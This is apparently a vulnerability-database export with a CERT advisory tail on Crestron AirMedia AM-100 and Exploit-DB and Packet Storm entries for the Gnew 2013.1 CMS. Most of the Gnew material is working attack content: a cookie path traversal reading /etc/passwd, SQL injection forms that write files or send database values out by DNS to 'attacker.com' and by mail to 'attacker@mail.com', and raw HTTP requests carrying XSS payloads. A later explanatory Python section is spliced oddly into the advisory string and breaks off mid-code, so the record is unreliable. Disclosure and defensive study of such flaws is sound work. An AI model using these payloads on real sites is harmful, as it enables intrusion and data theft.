execute. 
By default, the value of this parameter is `/sbin/iwpriv`; however, the value of this parameter can be a relative or absolute path to any arbitrary command on the underlying OS. \n \nCrestron AirMedia AM-100 firmware v1.1.1.11 - v1.2.1 are confirmed affected by the researcher. For more information see the researcher's [advisory one](<https://github.com/CylanceVulnResearch/disclosures/blob/master/CLVA-2016-05-001.md>) and [advisory two](<https://github.com/CylanceVulnResearch/disclosures/blob/master/CLVA-2016-05-002.md>). \n \n--- \n \n### Impact \n\nAn unauthenticated remote user may be able to access arbitrary files from the device filesystem, or execute arbitrary OS commands on the device. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nCrestron has released [firmware version 1.4.0.13](<http://www.crestron.com/products/model/AM-100>) to address these issues. Affected users should update the firmware of their AM-100 as soon as possible. \n \n--- \n \n### Vendor Information\n\n603047\n\n### Crestron Electronics\n\nUpdated: July 19, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 10.0 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 8.3 | E:F/RL:OF/RC:C \nEnvironmental | 6.2 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n\n### References \n\n * <http://www.crestron.com/products/model/AM-100>\n * <https://github.com/CylanceVulnResearch/disclosures/blob/master/CLVA-2016-05-001.md>\n * <https://github.com/CylanceVulnResearch/disclosures/blob/master/CLVA-2016-05-002.md>\n * <http://cwe.mitre.org/data/definitions/22.html>\n * <http://cwe.mitre.org/data/definitions/77.html>\n\n### Acknowledgements\n\nThanks to Zach Lanier of Cylance, Inc., for reporting this vulnerability.\n\nThis document was written by Garret Wassermann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2016-5639, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5639>) [CVE-2016-5640](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5640>) \n---|--- \n**Date Public:** | 2016-08-01 \n**Date First Published:** | 2016-08-01 \n**Date Last Updated:** | 2016-08-02 15:15 UTC \n**Document Revision:** | 22 \n", "modified": "2016-08-02T15:15:00", "published": "2016-08-01T00:00:00", "id": "VU:603047", "href": "https://www.kb.cert.org/vuls/id/603047", "type": "cert", "title": "Crestron AirMedia AM-100 contains multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-03T08:42:03", "bulletinFamily": "exploit", "description": "Gnew 2013.1 - Multiple Vulnerabilities. CVE-2013-5639,CVE-2013-5640,CVE-2013-7349. 
Webapps exploit for php platform", "modified": "2013-10-02T00:00:00", "published": "2013-10-02T00:00:00", "id": "EDB-ID:28684", "href": "https://www.exploit-db.com/exploits/28684/", "type": "exploitdb", "title": "Gnew 2013.1 - Multiple Vulnerabilities", "sourceData": "Advisory ID: HTB23171\r\nProduct: Gnew\r\nVendor: Raoul Proen\u00e7a\r\nVulnerable Version(s): 2013.1 and probably prior\r\nTested Version: 2013.1\r\nAdvisory Publication: August 28, 2013 [without technical details]\r\nVendor Notification: August 28, 2013\r\nPublic Disclosure: October 2, 2013\r\nVulnerability Type: PHP File Inclusion [CWE-98], SQL Injection [CWE-89]\r\nCVE References: CVE-2013-5639, CVE-2013-5640\r\nRisk Level: High\r\nCVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\r\nSolution Status: Solution Available\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Gnew, which can be exploited to execute arbitrary PHP code and perform SQL injection attacks against the vulnerable application.\r\n\r\n1) PHP File Inclusion in Gnew: CVE-2013-5639\r\n\r\nThe vulnerability exists due to insufficient validation of user-supplied input passed via the \"gnew_language\" cookie to the \"/users/login.php\" script before it is used in an \"include()\" call. 
A remote attacker can include and execute arbitrary local files on a vulnerable system via a directory traversal sequence and a URL-encoded NULL byte.\r\n\r\nThe following example displays the content of the \"/etc/passwd\" file:\r\n\r\nGET /users/login.php HTTP/1.1\r\nCookie: gnew_language=../../../etc/passwd%00;\r\n\r\n2) SQL Injection in Gnew: CVE-2013-5640\r\n\r\n2.1 The vulnerability exists due to insufficient filtration of the \"friend_email\" HTTP POST parameter passed to the \"/news/send.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in the application's database.\r\n\r\nThe following example sends the MySQL server version and database username to the email address \"attacker@mail.com\":\r\n\r\n<form action=\"http://[host]/news/send.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"send\" value=\"1\">\r\n<input type=\"hidden\" name=\"user_name\" value=\"username\">\r\n<input type=\"hidden\" name=\"user_email\" value=\"user@mail.com\">\r\n<input type=\"hidden\" name=\"friend_email\" value=\"attacker@mail.com\">\r\n<input type=\"hidden\" name=\"news_id\" value=\"-1' UNION SELECT version(),user() -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n2.2 The vulnerability exists due to insufficient filtration of the \"user_email\" HTTP POST parameter passed to the \"/users/register.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in the application's database.\r\n\r\nThe example below writes the database username and MySQL server version into the file \"/var/www/file.txt\". 
Successful exploitation requires that the MySQL server has write access to the \"/var/www\" directory.\r\n\r\n<form action=\"http://[host]/users/register.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"register\" value=\"1\">\r\n<input type=\"hidden\" name=\"user_email\" value=\"' UNION SELECT user(),version() INTO OUTFILE '/var/www/file.txt' -- 2\">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n2.3 The vulnerability exists due to insufficient filtration of the \"answer_id\" HTTP POST parameter passed to the \"/polls/vote.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in the application's database.\r\n\r\nThe PoC code below is based on the DNS exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC sends a DNS request for the IP address of a subdomain of \".attacker.com\" (a domain whose DNS server is controlled by the attacker), using the output of `version()` (or any other sensitive value from the database) as the subdomain label:\r\n\r\n<form action=\"http://[host]/polls/vote.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"add_vote\" value=\"1\">\r\n<input type=\"hidden\" name=\"answer_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"hidden\" name=\"question_id\" value=\"1\">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n2.4 The vulnerability exists due to insufficient filtration of the \"question_id\" HTTP POST parameter passed to the \"/polls/vote.php\" script. 
A remote authenticated attacker can execute arbitrary SQL commands in the application's database.\r\n\r\nThe PoC code below is based on the DNS exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC sends a DNS request for the IP address of a subdomain of \".attacker.com\" (a domain whose DNS server is controlled by the attacker), using the output of `version()` (or any other sensitive value from the database) as the subdomain label:\r\n\r\n<form action=\"http://[host]/polls/vote.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"add_vote\" value=\"1\">\r\n<input type=\"hidden\" name=\"answer_id\" value=\"1\">\r\n<input type=\"hidden\" name=\"question_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n2.5 The vulnerability exists due to insufficient filtration of the \"story_id\" HTTP POST parameter passed to the \"/comments/add.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in the application's database.\r\n\r\nThe PoC code below is based on the DNS exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC sends a DNS request for the IP address of a subdomain of \".attacker.com\" (a domain whose DNS server is controlled by the attacker), using the output of `version()` (or any other sensitive value from the database) as the subdomain label:\r\n\r\n<form action=\"http://[host]/comments/add.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"add\" value=\"1\">\r\n<input type=\"hidden\" name=\"preview\" value=\"1\">\r\n<input type=\"hidden\" name=\"comment_subject\" value=\"1\">\r\n<input type=\"hidden\" name=\"comment_text\" value=\"1\">\r\n<input type=\"hidden\" name=\"story_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n2.6 The vulnerability exists due to insufficient filtration of the \"story_id\" HTTP POST parameter passed to the \"/comments/edit.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in the application's database.\r\n\r\nThe PoC code below is based on the DNS exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC sends a DNS request for the IP address of a subdomain of \".attacker.com\" (a domain whose DNS server is controlled by the attacker), using the output of `version()` (or any other sensitive value from the database) as the subdomain label:\r\n\r\n<form action=\"http://[host]/comments/edit.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"edit\" value=\"1\">\r\n<input type=\"hidden\" name=\"preview_edited\" value=\"1\">\r\n<input type=\"hidden\" name=\"comment_subject\" value=\"1\">\r\n<input type=\"hidden\" name=\"comment_text\" value=\"1\">\r\n<input type=\"hidden\" name=\"story_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n2.7 The vulnerability exists due to insufficient filtration of the \"thread_id\" HTTP POST parameter passed to the \"/posts/add.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in the application's database.\r\n\r\nThe PoC code below is based on the DNS exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC sends a DNS request for the IP address of a subdomain of \".attacker.com\" (a domain whose DNS server is controlled by the attacker), using the output of `version()` (or any other sensitive value from the database) as the subdomain label:\r\n\r\n<form action=\"http://[host]/posts/add.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"add\" value=\"1\">\r\n<input type=\"hidden\" name=\"preview\" value=\"1\">\r\n<input type=\"hidden\" name=\"thread_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n2.8 The vulnerability exists due to insufficient filtration of the \"thread_id\" HTTP POST parameter passed to the \"/posts/edit.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in the application's database.\r\n\r\nThe PoC code below is based on the DNS exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC sends a DNS request for the IP address of a subdomain of \".attacker.com\" (a domain whose DNS server is controlled by the attacker), using the output of `version()` (or any other sensitive value from the database) as the subdomain label:\r\n\r\n<form action=\"http://[host]/posts/edit.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"edit\" value=\"1\">\r\n<input type=\"hidden\" name=\"preview_edited\" value=\"1\">\r\n<input type=\"hidden\" name=\"thread_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\nSuccessful exploitation of vulnerabilities 2.3-2.8 requires that the attacker is registered and logged in. Registration is open by default.\r\n\r\nVulnerabilities 2.1, 2.2 and 2.8 were discovered by Gjoko Krstic (http://packetstormsecurity.com/files/122771) on July 23, 2013. High-Tech Bridge Security Research Lab discovered these vulnerabilities independently and publishes them because they remain unpatched since the vendor notification date.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nThe vendor did not reply to 6 notifications by email. 
Currently we are not aware of any official solution for these vulnerabilities.\r\n\r\nAn unofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23171-patch.zip\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23171 - https://www.htbridge.com/advisory/HTB23171 - Multiple vulnerabilities in Gnew.\r\n[2] Gnew - http://www.gnew.fr - Gnew is a simple and open-source Content Management System.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with a SaaS delivery model that combines manual and automated vulnerability testing.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/28684/"}, {"lastseen": "2016-02-03T06:07:55", "bulletinFamily": "exploit", "description": "Gnew 2013.1 - Multiple Vulnerabilities. CVE-2013-5640,CVE-2013-7349,CVE-2013-7368. 
Webapps exploit for php platform", "modified": "2013-08-12T00:00:00", "published": "2013-08-12T00:00:00", "id": "EDB-ID:27522", "href": "https://www.exploit-db.com/exploits/27522/", "type": "exploitdb", "title": "Gnew 2013.1 - Multiple Vulnerabilities", "sourceData": "\r\nGnew v2013.1 Multiple XSS And SQL Injection Vulnerabilities\r\n\r\n\r\nVendor: Raoul Proen\u00e7a\r\nProduct web page: http://www.gnew.fr\r\nAffected version: 2013.1\r\n\r\nSummary: Gnew is a simple Content Management\r\nSystem written with PHP language and using a\r\ndatabase server (MySQL, PostgreSQL or SQLite)\r\nfor storage.\r\n\r\nDesc: Input passed via several parameters is not properly\r\nsanitised before being returned to the user or used in SQL\r\nqueries. This can be exploited to manipulate SQL queries\r\nby injecting arbitrary SQL code and HTML/script code in a\r\nuser's browser session in context of an affected site.\r\n\r\n\r\n============================================================================================\r\n| PARAM | TYPE | FILE |\r\n============================================================================================\r\n| |\r\n| gnew_template | XSS | /users/profile.php, /articles/index.php, /admin/polls.php |\r\n|------------------------------------------------------------------------------------------|\r\n| category_id | XSS | /news/submit.php |\r\n|------------------------------------------------------------------------------------------|\r\n| news_id | XSS, SQLi | /news/send.php, /comments/add.php |\r\n|------------------------------------------------------------------------------------------|\r\n| post_subject | XSS | /posts/edit.php |\r\n|------------------------------------------------------------------------------------------|\r\n| thread_id | XSS, SQLi | /posts/edit.php |\r\n|------------------------------------------------------------------------------------------|\r\n| user_email | SQLi | /users/register.php, /users/password.php |\r\n| 
|\r\n============================================================================================\r\n\r\n\r\n\r\nTested on: Microsoft Windows 7 Ultimate SP1 (EN)\r\n Apache 2.4.2 (Win32)\r\n PHP 5.4.7\r\n MySQL 5.5.25a\r\n\r\n\r\nVulnerabilities discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\n\r\nAdvisory ID: ZSL-2013-5153\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5153.php\r\n\r\n\r\n\r\n23.07.2013\r\n\r\n---\r\n\r\n\r\n#1 [xss]\r\n\r\nGET /gnew/users/profile.php HTTP/1.1\r\nHost: localhost\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/gnew/admin/index.php\r\nCookie: PHPSESSID=8nta354i78d5att3l2gkh9g573; gnew_date_format=D%2C+M+jS+Y%2C+g%3Ai+a; gnew_date_offset=0; gnew_language=english; gnew_template=clean\"><script>alert(1)</script>\r\nConnection: keep-alive\r\n\r\n\r\n#2 [xss]\r\n\r\nPOST /gnew/news/submit.php HTTP/1.1\r\nContent-Length: 112\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: http://localhost:80/gnew/\r\nHost: localhost\r\nConnection: Keep-alive\r\nAccept-Encoding: gzip,deflate\r\n\r\ncategory_id=1\"><script>alert(2);</script>&news_source=1&news_subject=1&news_text=1&preview=Preview&submit=Submit\r\n\r\n\r\n#3 [xss]\r\n\r\nPOST /gnew/news/send.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: http://localhost:80/gnew/\r\nHost: localhost\r\nConnection: Keep-alive\r\nAccept-Encoding: gzip,deflate\r\n\r\nfriend_email=lab@zeroscience.mk&html_email=1&news_id=572\"><script>alert(3);</script>&send=Send&user_email=root@att.com&user_name=admin\r\n\r\n\r\n#4 [xss]\r\n\r\nPOST /gnew/comments/add.php HTTP/1.1\r\nContent-Length: 96\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: http://localhost:80/gnew/\r\nHost: localhost\r\nConnection: Keep-alive\r\nAccept-Encoding: 
gzip,deflate\r\n\r\nadd=Add&comment_subject=1&comment_text=1&news_id=574\"><script>alert(4);</script>&preview=Preview\r\n\r\n\r\n#5 [sqli]\r\n\r\nPOST /gnew/news/send.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: http://localhost:80/gnew/\r\nHost: localhost\r\nConnection: Keep-alive\r\nAccept-Encoding: gzip,deflate\r\n\r\nfriend_email=lab@zeroscience.mk&html_email=1&news_id=572{SQL Injection}&send=Send&user_email=root@att.com&user_name=admin\r\n\r\n\r\n#6 [xss]\r\n\r\nPOST /gnew/posts/edit.php HTTP/1.1\r\nContent-Length: 153\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: http://localhost:80/gnew/\r\nHost: localhost\r\nConnection: Keep-alive\r\nAccept-Encoding: gzip,deflate\r\n\r\ncategory_id=1&edit=Edit&post_creation=1374594465&post_id=6&post_subject=zsl\"><script>alert(5);</script>&post_text=test&preview_edited=Preview&thread_id=6\r\n\r\n\r\n#7 [xss]\r\n\r\nPOST /gnew/posts/edit.php HTTP/1.1\r\nContent-Length: 184\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: http://localhost:80/gnew/\r\nHost: localhost\r\nConnection: Keep-alive\r\nAccept-Encoding: gzip,deflate\r\n\r\ncategory_id=1&edit=Edit&post_creation=1374594465&post_id=6&post_subject=test&post_text=test&preview_edited=Preview&thread_id=6\"><script>alert(6);</script>\r\n\r\n\r\n#8 [sqli]\r\n\r\nPOST /gnew/posts/edit.php HTTP/1.1\r\nHost: localhost\r\nContent-Length: 127\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: http://localhost:80/gnew/\r\nHost: localhost\r\nConnection: Keep-alive\r\nAccept-Encoding: gzip,deflate\r\n\r\ncategory_id=1&edit=Edit&post_creation=1374594465&post_id=6&post_subject=test&post_text=test&preview_edited=Preview&thread_id=6{SQL Injection}\r\n\r\n\r\n#9 [sqli]\r\n\r\nPOST /gnew/users/password.php HTTP/1.1\r\nHost: localhost\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: 
http://localhost/gnew/users/password.php\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 40\r\n\r\nuser_name=test&user_email={SQL Injection}&password=Send\r\n\r\n\r\n#10 [sqli]\r\n\r\nPOST /gnew/users/register.php HTTP/1.1\r\nHost: localhost\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/gnew/users/password.php\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 40\r\n\r\nuser_name=test&user_email={SQL Injection}&password=Send\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/27522/"}], "packetstorm": [{"lastseen": "2016-12-05T22:18:50", "bulletinFamily": "exploit", "description": "", "modified": "2013-10-02T00:00:00", "published": "2013-10-02T00:00:00", "href": "https://packetstormsecurity.com/files/123482/Gnew-2013.1-PHP-File-Inclusion-SQL-Injection.html", "id": "PACKETSTORM:123482", "type": "packetstorm", "title": "Gnew 2013.1 PHP File Inclusion / SQL Injection", "sourceData": "`Advisory ID: HTB23171 \nProduct: Gnew \nVendor: Raoul Proen\u00e7a \nVulnerable Version(s): 2013.1 and probably prior \nTested Version: 2013.1 \nAdvisory Publication: August 28, 2013 [without technical details] \nVendor Notification: August 28, 2013 \nPublic Disclosure: October 2, 2013 \nVulnerability Type: PHP File Inclusion [CWE-98], SQL Injection [CWE-89] \nCVE References: CVE-2013-5639, CVE-2013-5640 \nRisk Level: High \nCVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) \nSolution Status: Solution Available \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n 
\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Gnew, which can be exploited to execute arbitrary PHP code and perform SQL injection attacks against the vulnerable application. \n \n \n1) PHP File Inclusion in Gnew: CVE-2013-5639 \n \nThe vulnerability exists due to insufficient validation of user-supplied input passed via the \"gnew_language\" cookie to the \"/users/login.php\" script before it is used in an \"include()\" call. A remote attacker can include and execute arbitrary local files on a vulnerable system via a directory traversal sequence and a URL-encoded NULL byte. \n \nThe following example displays the content of the \"/etc/passwd\" file: \n \n \nGET /users/login.php HTTP/1.1 \nCookie: gnew_language=../../../etc/passwd%00; \n \n \n \n2) SQL Injection in Gnew: CVE-2013-5640 \n \n2.1 The vulnerability exists due to insufficient filtration of the \"friend_email\" HTTP POST parameter passed to the \"/news/send.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in the application's database. \n \nThe following example sends the MySQL server version and database username to the email address \"attacker@mail.com\": \n \n \n<form action=\"http://[host]/news/send.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"send\" value=\"1\"> \n<input type=\"hidden\" name=\"user_name\" value=\"username\"> \n<input type=\"hidden\" name=\"user_email\" value=\"user@mail.com\"> \n<input type=\"hidden\" name=\"friend_email\" value=\"attacker@mail.com\"> \n<input type=\"hidden\" name=\"news_id\" value=\"-1' UNION SELECT version(),user() -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \n \n2.2 The vulnerability exists due to insufficient filtration of the \"user_email\" HTTP POST parameter passed to the \"/users/register.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in the application's database. 
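
The file inclusion in section 1 above only works because the include path is cut at the URL-encoded NULL byte: whatever suffix the script appends after the cookie value (typically ".php") never reaches the filesystem, so "../../../etc/passwd%00" resolves to the bare passwd file. The following Python model is an added example and not Gnew's own code; the languages directory, the appended ".php" suffix, the allow-list of language names and the NUL truncation it emulates are assumptions made for the demonstration. It places the vulnerable pattern next to an allow-list check that rejects the cookie value before it is ever joined into a path:

```python
import posixpath
from urllib.parse import unquote

# Assumed layout (not taken from Gnew's source): language files live under
# LANG_DIR and the script appends '.php' to the cookie value before include().
LANG_DIR = '/var/www/gnew/languages'
# Constructed allow-list of language names the hardened version accepts.
ALLOWED_LANGUAGES = frozenset({'english', 'french'})


def vulnerable_include_path(cookie_value):
    """Model of include('languages/' . $_COOKIE['gnew_language'] . '.php').

    The advisory's payload works only because the runtime cut the path at the
    first NUL byte, so the '.php' suffix never reaches the filesystem. That
    truncation is emulated here by splitting on the NUL.
    """
    raw = LANG_DIR + '/' + cookie_value + '.php'
    truncated = raw.split('\x00', 1)[0]
    return posixpath.normpath(truncated)


def cookie_to_include_path(raw_cookie):
    """The cookie arrives URL-encoded; %00 becomes a real NUL before the include."""
    return vulnerable_include_path(unquote(raw_cookie))


def escapes_lang_dir(path):
    """True when the resolved include path lies outside LANG_DIR."""
    return posixpath.commonpath([LANG_DIR, path]) != LANG_DIR


def safe_include_path(cookie_value):
    """Hardened form: the cookie may only name a known language, never a path."""
    if '\x00' in cookie_value:
        raise ValueError('NUL byte in language cookie')
    if cookie_value not in ALLOWED_LANGUAGES:
        raise ValueError('unknown language: %r' % cookie_value)
    path = posixpath.normpath(posixpath.join(LANG_DIR, cookie_value + '.php'))
    if escapes_lang_dir(path):  # belt and braces; cannot trigger after the allow-list
        raise ValueError('language path escapes LANG_DIR')
    return path


if __name__ == '__main__':
    attack = '../../../etc/passwd%00'  # the cookie value from the advisory
    print(cookie_to_include_path(attack))                 # /var/etc/passwd
    print(cookie_to_include_path('../../../etc/passwd'))  # /var/etc/passwd.php
    try:
        safe_include_path(unquote(attack))
    except ValueError as err:
        print('rejected:', err)
```

Without the NUL the same traversal still lands on "passwd.php", which does not exist, which is why the advisory's request carries the %00. The allow-list is the actual fix; the commonpath check only guards against a future change that lets an unlisted value through.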
\n \nThe example below writes the database username and MySQL server version into the file \"/var/www/file.txt\". Successful exploitation requires that the MySQL server has write access to the \"/var/www\" directory. \n \n \n<form action=\"http://[host]/users/register.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"register\" value=\"1\"> \n<input type=\"hidden\" name=\"user_email\" value=\"' UNION SELECT user(),version() INTO OUTFILE '/var/www/file.txt' -- 2\"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \n \n2.3 The vulnerability exists due to insufficient filtration of the \"answer_id\" HTTP POST parameter passed to the \"/polls/vote.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in the application's database. \n \nThe PoC code below is based on the DNS exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC sends a DNS request for the IP address of a subdomain of \".attacker.com\" (a domain whose DNS server is controlled by the attacker), using the output of `version()` (or any other sensitive value from the database) as the subdomain label: \n \n \n<form action=\"http://[host]/polls/vote.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"add_vote\" value=\"1\"> \n<input type=\"hidden\" name=\"answer_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \"> \n<input type=\"hidden\" name=\"question_id\" value=\"1\"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \n \n2.4 The vulnerability exists due to insufficient filtration of the \"question_id\" HTTP POST parameter passed to the \"/polls/vote.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in the application's database. 
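
The load_file(CONCAT(CHAR(92),CHAR(92),...)) value used in PoC 2.3, and reused unchanged in 2.4 through 2.8, builds a UNC path whose host name begins with the query result. On a Windows database host the OS has to resolve that host name before it can open the share, so the attacker's authoritative DNS server sees the result as a label of a query for attacker.com; nothing needs to come back to the browser. The following Python is an added example, not part of the advisory: it decodes the CHAR() list into the path MySQL would hand to the OS (the 5.5.25 version string and the root@localhost user are sample values standing in for what version() and user() would return), pulls out the host that gets looked up, and gives a regex a WAF or log search can use to flag the same construction in submitted parameters:

```python
import re

# Constructed copy of the answer_id value from PoC 2.3 (PoCs 2.4-2.8 reuse it verbatim).
PAYLOAD = ("' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),"
           "CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),"
           "CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),"
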